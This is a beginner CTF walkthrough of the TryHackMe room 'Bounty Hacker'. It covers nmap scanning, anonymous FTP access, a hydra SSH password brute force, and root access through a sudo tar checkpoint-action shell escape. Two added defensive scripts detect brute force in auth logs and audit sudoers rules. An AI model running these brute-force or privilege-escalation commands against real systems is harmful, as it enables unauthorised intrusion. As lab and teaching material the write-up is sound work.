Bounty Hacker – A TryHackMe Writeup

This article is a write-up of the TryHackMe Room “Bounty Hacker”. I will explain my way of tackling this room and show you the solution that worked for me. No flags will be shown!

Link to the room: https://tryhackme.com/room/cowboyhacker

Difficulty: Beginner
Time: 15-30 minutes, depending on your knowledge

Prerequisites

  • Connect to the TryHackMe VPN and find your IP address
  • Start the room and note the IP address of your server

I suggest you create a variable for the IP address in your terminal instance. This makes it easier to follow my guide.

export IP=SERVER_IP

All commands are tested on a “fresh” Kali Linux installation. If you are using a different OS, you might need to change parts of these commands.

Task 1: Living up to the title.

You were boasting on and on about your elite hacker skills in the bar and a few Bounty Hunters decided they’d take you up on claims! Prove your status is more than just a few glasses at the bar. I sense bell peppers & beef in your future! 

https://tryhackme.com/room/cowboyhacker

This room does not give you any time to prepare. You got drunk and boasted your hacking skills. Now you have to show them what you’ve got!

Question 1: Deploy the machine

This should be easy enough. Go ahead, start the machine and wait for the IP address to be displayed.

Question 2: Find open ports on the machine

The easiest way to check a remote server for open ports is to use “nmap”. In this case we can see three (3) open ports.

  • 21 – FTP
  • 22 – SSH
  • 80 – HTTP

nmap -sC -sV $IP
	┌──(dc㉿kali)-[~]
	└─$ nmap -sC -sV $IP
	Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-11 19:39 CEST
	Nmap scan report for 10.10.247.146
	Host is up (0.079s latency).
	Not shown: 967 filtered ports, 30 closed ports
	PORT   STATE SERVICE VERSION
	21/tcp open  ftp     vsftpd 3.0.3
	| ftp-anon: Anonymous FTP login allowed (FTP code 230)
	|_Can't get directory listing: TIMEOUT
	| ftp-syst: 
	|   STAT: 
	| FTP server status:
	|      Connected to ::ffff:10.8.18.2
	|      Logged in as ftp
	|      TYPE: ASCII
	|      No session bandwidth limit
	|      Session timeout in seconds is 300
	|      Control connection is plain text
	|      Data connections will be plain text
	|      At session startup, client count was 1
	|      vsFTPd 3.0.3 - secure, fast, stable
	|_End of status
	22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
	| ssh-hostkey: 
	|   2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
	|   256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
	|_  256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
	80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
	|_http-server-header: Apache/2.4.18 (Ubuntu)
	|_http-title: Site doesn't have a title (text/html).
	Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

	Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
	Nmap done: 1 IP address (1 host up) scanned in 44.78 seconds

Question 3: Who wrote the task list?

Two questions arise:

  • Which task list?
  • Where can I find it?

Let’s start by checking the website that is running on port 80.

Well… that does not look too interesting. Maybe there is a hidden directory? Let’s run gobuster to check for anything interesting.

gobuster dir --url http://$IP/content -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

While gobuster is doing its thing, let’s look at the nmap scan again. Maybe we missed something?

	21/tcp open  ftp     vsftpd 3.0.3
	| ftp-anon: Anonymous FTP login allowed (FTP code 230)
	|_Can't get directory listing: TIMEOUT
	| ftp-syst: 
	|   STAT: 
	| FTP server status:
	|      Connected to ::ffff:10.8.18.2
	|      Logged in as ftp
	|      TYPE: ASCII
	|      No session bandwidth limit
	|      Session timeout in seconds is 300
	|      Control connection is plain text
	|      Data connections will be plain text
	|      At session startup, client count was 1
	|      vsFTPd 3.0.3 - secure, fast, stable
	|_End of status

There is an FTP share with anonymous login! Let’s see what we can find on this share.

┌──(dc㉿kali)-[~/dailycompute/tryhackme]
└─$ ftp $IP                
Connected to 10.10.247.100.
220 (vsFTPd 3.0.3)
Name (10.10.247.100:dc): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt
-rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt
226 Directory send OK.

Two files show up in the FTP share directory. We should download them and take a closer look.

ftp> get task.txt
local: task.txt remote: task.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for task.txt (68 bytes).
226 Transfer complete.
68 bytes received in 0.02 secs (3.8487 kB/s)
ftp> get locks.txt
local: locks.txt remote: locks.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for locks.txt (418 bytes).
226 Transfer complete.
418 bytes received in 0.10 secs (4.1271 kB/s)
ftp> exit

locks.txt contains a list of random words that look like passwords. task.txt on the other hand contains a list of tasks and a username that is the answer to Question 3. At that point we can also stop gobuster, since we already have a good idea of how to get in.

cat locks.txt
cat task.txt

Question 4: What is the user’s password?

We have a username and a list of passwords. We also know from the nmap scan that there is SSH available on port 22. We should probably try to connect and check if one of the passwords might work. We could of course try every single password by hand, or we can use a tool called “hydra” to speed up the process. Hydra allows us to brute-force all combinations of the username and the list of passwords.

hydra -l username -P locks.txt $IP ssh
	┌──(dc㉿kali)-[~/dailycompute/bounty_hacker]
	└─$ hydra -l lin -P locks.txt $IP ssh
	Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

	Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-11 19:49:32
	[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
	[DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task
	[DATA] attacking ssh://10.10.247.146:22/
	[22][ssh] host: 10.10.247.146   login: ***   password: *******************
	1 of 1 target successfully completed, 1 valid password found
	[WARNING] Writing restore file because 4 final worker threads did not complete until end.
	[ERROR] 4 targets did not resolve or could not be connected
	[ERROR] 0 target did not complete
	Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-09-11 19:49:44

Bingo! We have the password. Let’s answer the question and log in.
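A run like the one above is loud on the target: every guess hydra makes leaves a “Failed password” line in the server’s auth log, and the hit leaves an “Accepted password” line from the same source a few seconds later. The following Python script is an added example for this write-up (not part of the room or the original post) showing how a defender detects that pattern: it parses sshd lines in the syslog format OpenSSH writes to /var/log/auth.log, raises one alert per source address that fails a threshold of logins inside a time window, and raises a second alert if that same source then logs in successfully. The log lines are constructed, the year is assumed (syslog timestamps carry none), and the threshold and window are my own defaults.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample of the lines OpenSSH writes to /var/log/auth.log during a
# password-guessing run followed by a successful login (not taken from the page).
SAMPLE_AUTH_LOG = """\
Sep 11 19:49:33 bounty sshd[1201]: Failed password for lin from 10.8.18.2 port 51002 ssh2
Sep 11 19:49:33 bounty sshd[1203]: Failed password for lin from 10.8.18.2 port 51004 ssh2
Sep 11 19:49:34 bounty sshd[1205]: Failed password for lin from 10.8.18.2 port 51006 ssh2
Sep 11 19:49:34 bounty sshd[1207]: Failed password for invalid user admin from 10.8.18.50 port 40100 ssh2
Sep 11 19:49:35 bounty sshd[1209]: Failed password for lin from 10.8.18.2 port 51008 ssh2
Sep 11 19:49:36 bounty sshd[1211]: Failed password for lin from 10.8.18.2 port 51010 ssh2
Sep 11 19:49:37 bounty sshd[1213]: Failed password for lin from 10.8.18.2 port 51012 ssh2
Sep 11 19:49:40 bounty sshd[1240]: Accepted password for lin from 10.8.18.2 port 51030 ssh2
"""

AUTH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>[\d.]+) port \d+ ssh2$"
)


def parse_auth_line(line, year=2021):
    """Parse one sshd password-auth line; syslog lines carry no year, so one is assumed."""
    m = AUTH_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "src": m["src"]}


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Alert once per source that fails `threshold` logins inside `window_seconds`,
    and again if that same source then succeeds (the trace a hydra run leaves)."""
    failures = defaultdict(deque)   # src -> timestamps of recent failures
    alerted = set()
    alerts = []
    for e in filter(None, (parse_auth_line(line) for line in lines)):
        q = failures[e["src"]]
        # forget failures that fell out of the window
        while q and (e["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if e["result"] == "Failed":
            q.append(e["ts"])
            if len(q) >= threshold and e["src"] not in alerted:
                alerted.add(e["src"])
                alerts.append(("bruteforce", e["src"], e["user"], e["ts"].isoformat()))
        elif e["src"] in alerted:
            # a success from a source that was already guessing is the one to escalate
            alerts.append(("success_after_bruteforce", e["src"], e["user"], e["ts"].isoformat()))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG.splitlines()):
        print(*alert)
```

The single failure from 10.8.18.50 never reaches the threshold and stays quiet, while 10.8.18.2 trips the first alert on its fifth failure and the second one on the later success. The same rule is what tools such as fail2ban implement in production, with the difference that they also act (by banning the source); disabling password authentication in sshd in favour of keys removes the attack class entirely.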

Question 5: user.txt

Once we are logged in we can just open the user.txt file and see the flag.

cat user.txt
THM{****************}

Question 6: root.txt

To read the root.txt file we somehow need to escalate our privileges. First of all, let’s check if we can use sudo:

sudo echo "hello"

Sadly that is not the case. Next, we can check if there is an executable that the current user is allowed to run with higher privileges:

sudo -l

It turns out that this user can run /bin/tar with sudo and without supplying a password. Maybe we can leverage this to gain root access? Let’s check GTFObins!

https://gtfobins.github.io/gtfobins/tar/

That’s helpful! Let’s try to use it!

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

The result is a very minimalistic shell. Trying to use whoami results in an error. But if we try to read /root/root.txt… there is the flag! SUCCESS!

cat /root/root.txt
THM{*******************}
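The root of this privilege escalation is a single sudoers rule: a user may run /bin/tar as root without a password, and tar can hand that root context to a shell. An administrator reviewing sudoers wants to catch such rules before anyone else does. The following Python script is an added example for this write-up (it is not part of the room or the original post): it parses user and group rules from sudoers-style text, skips comments and Defaults lines, and reports every NOPASSWD command with a severity. The sudoers content is constructed (the lin line mirrors the kind of rule found with sudo -l above), and SHELL_ESCAPE_BINARIES is my own assumption, seeded only with tar, the binary this write-up used; GTFObins documents further candidates.

```python
import re
from pathlib import PurePosixPath

# Constructed sample sudoers content (not from the room's machine). The "lin" line
# mirrors the kind of rule the write-up found with `sudo -l`.
SAMPLE_SUDOERS = """\
# constructed sample
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
lin     ALL=(root) NOPASSWD: /bin/tar
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app, /usr/bin/git pull
backup  ALL=(ALL) NOPASSWD: ALL
"""

# Binaries that can hand out a shell when run under sudo, as documented on
# GTFObins. Only tar (the one used in this write-up) is listed; extend as needed.
SHELL_ESCAPE_BINARIES = {"tar"}

# user_or_group  host=(runas) [TAG: ...] command[, command...]
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Return (who, tags, [commands]) for each user/group rule; comments and Defaults are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments (also drops #include lines)
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip(":") for t in m["tags"].split()}
        cmds = [c.strip() for c in m["cmds"].split(",")]
        rules.append((m["who"], tags, cmds))
    return rules


def audit_sudoers(text):
    """Return (who, command, severity) for every command that runs without a password."""
    findings = []
    for who, tags, cmds in parse_sudoers(text):
        if "NOPASSWD" not in tags:
            continue
        for cmd in cmds:
            if cmd == "ALL":
                severity = "critical"   # unrestricted root with no password at all
            elif PurePosixPath(cmd.split()[0]).name in SHELL_ESCAPE_BINARIES:
                severity = "high"       # binary is known to spawn a root shell
            else:
                severity = "medium"     # still passwordless root; review the arguments
            findings.append((who, cmd, severity))
    return findings


if __name__ == "__main__":
    for who, cmd, severity in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{severity:<8} {who:<8} {cmd}")
```

For the lin rule the fix is to drop NOPASSWD or, better, to replace direct access to tar with a small wrapper script that takes no user-controlled arguments and is the only thing the rule allows; root and %sudo still authenticate and therefore produce no finding.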

Conclusion

I hope you enjoyed this walkthrough. If you have any questions, do not hesitate to leave a comment. I will try to answer as soon as possible. Thank you for your time!

-DiddyRise
